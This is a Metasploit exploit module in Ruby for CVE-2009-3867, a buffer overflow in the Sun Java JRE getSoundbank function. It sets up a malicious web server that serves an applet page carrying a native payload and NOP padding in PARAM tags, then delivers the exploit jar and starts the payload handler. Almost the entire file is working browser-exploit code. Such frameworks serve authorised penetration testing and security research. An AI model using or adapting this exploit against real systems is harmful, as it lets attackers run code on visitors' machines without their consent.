##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
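class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Seconds a client may stay idle before its entry in @targetcache is dropped.
  TARGET_CACHE_TTL = 60

  # User-Agent sniffing table used only by the (currently disabled) Automatic
  # target: [ UA pattern, label printed in the status line, pattern matched
  # against the target *name* ]. Targets are looked up by name rather than by
  # position so the choice does not silently break when the Targets list is
  # reordered (the original index-based lookup assumed the Automatic entry
  # occupied slot 0, which is not the case while it is commented out).
  UA_TARGETS = [
    [ /Windows/i,        'Windows',      /Windows x86/  ],
    [ /PPC Mac OS X/i,   'Mac OS X PPC', /Mac OS X PPC/ ],
    [ /Intel Mac OS X/i, 'Mac OS X x86', /Mac OS X x86/ ]
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
        'Description' => %q{
          This module exploits a flaw in the getSoundbank function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'kf',    # Original PoC/exploit
          'jduck'  # metasploit version
        ],
        'References' => [
          [ 'CVE', '2009-3867' ],
          [ 'OSVDB', '59711' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-076' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
        },
        'Platform' => %w{win osx},
        'Targets' => [
          # No automatic targetting for now ...
          #
          # [ 'J2SE 1.6_16 Automatic',
          #   {
          #     'Platform' => %w{ linux osx win },
          #     'Arch' => [ARCH_X86, ARCH_PPC]
          #   }
          # ],
          [
            'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-11-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the precompiled applet jar from the data directory into @jar_data,
  # then starts the HTTP server. The jar is read once and served verbatim to
  # every client. File.binread closes the descriptor even if the read raises,
  # which the previous open/read/close sequence did not.
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")
    @jar_data = File.binread(path)

    super
  end

  # Serves three kinds of response depending on the request URI:
  #   * a URI without a trailing slash is redirected to the resource + '/',
  #     so that the relative 'archive' reference in the applet tag resolves;
  #   * any other non-.jar URI gets the HTML page that embeds the applet and
  #     carries the payload in PARAM tags;
  #   * a .jar URI gets the applet itself, after which the payload handler
  #     is started.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected client
  # @param req [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, req)
    # Cache keyed by source address; clients that share an address (NAT)
    # share -- and overwrite -- one entry.
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = Time.now.to_i

    # The User-Agent is fully client-controlled, so treat the sniffed
    # platform as a hint only. This branch is dormant while the Automatic
    # target stays commented out in the Targets list.
    if target.name =~ /Automatic/
      ua = req.headers['User-Agent'].to_s
      match = UA_TARGETS.find { |ua_re, _label, _name_re| ua_re.match?(ua) }
      if match
        _, label, name_re = match
        print_status("Choosing a #{label} target")
        @targetcache[cli.peerhost][:target] = targets.find { |t| t.name =~ name_re }
      else
        print_status("Unknown target for: #{ua}")
      end
    end

    # Expire entries for clients not seen within the TTL.
    now = Time.now.to_i
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + TARGET_CACHE_TTL }

    # Request processing
    unless req.uri =~ /\.jar\z/i
      # Redirect to the base directory so the applet code loads...
      unless req.uri.end_with?('/')
        print_status("Sending redirect so path ends with / ...")
        send_redirect(cli, get_resource + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status("Sending HTML")
      send_response_html(cli, generate_html(payload.encoded),
        {
          'Content-Type' => 'text/html',
          'Pragma' => 'no-cache'
        })
      return
    end

    # Send the actual applet over
    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req),
      {
        'Content-Type' => 'application/octet-stream',
        'Pragma' => 'no-cache'
      })

    # Handle the payload
    handler(cli)
  end

  # Builds the HTML page that loads the applet. The jar name is randomised
  # per response, and the native payload plus a short NOP block are passed to
  # the applet as hex strings in PARAM tags.
  #
  # @param pl [String] the encoded native payload bytes
  # @return [String] the finished HTML document
  def generate_html(pl)
    html = <<~EOF
      <html>
      <head>
      <!-- <meta http-equiv=refresh content=10 /> -->
      </head>
      <body>
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
      <param name='sc' value='SCODE' />
      <param name='np' value='NOPS' />
      </applet>
      </body>
      </html>
    EOF

    # finalize the html -- alphanumeric only, so it is safe inside the
    # attribute and contains no gsub backreference characters
    jar_name = rand_text_alphanumeric(32) + '.jar'
    html.gsub!(/JARNAME/, jar_name)

    # add payload
    debug_payload = false
    pload = ''.b
    pload << "\xcc" if debug_payload  # int3 so an attached debugger stops on entry
    pload << pl
    # Pad to a multiple of 4 bytes (bytesize, not length, since this is raw
    # binary). Presumably the applet consumes the hex string in 4-byte units;
    # confirm against AppletX in the jar.
    if (pload.bytesize % 4) > 0
      pload << rand_text(4 - (pload.bytesize % 4))
    end
    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # add nops
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    html
  end

  # Returns the applet jar to serve. The same static jar is used for every
  # target; the only per-client decision is that, under the Automatic target,
  # nothing is served until the client's platform was identified by an
  # earlier request.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected client
  # @param req [Rex::Proto::Http::Request] the request (unused)
  # @return [String] the jar bytes, or '' when no target has been chosen yet
  def generate_applet(cli, req)
    if target.name =~ /Automatic/ && !@targetcache&.dig(cli.peerhost, :target)
      return ''
    end

    @jar_data
  end
end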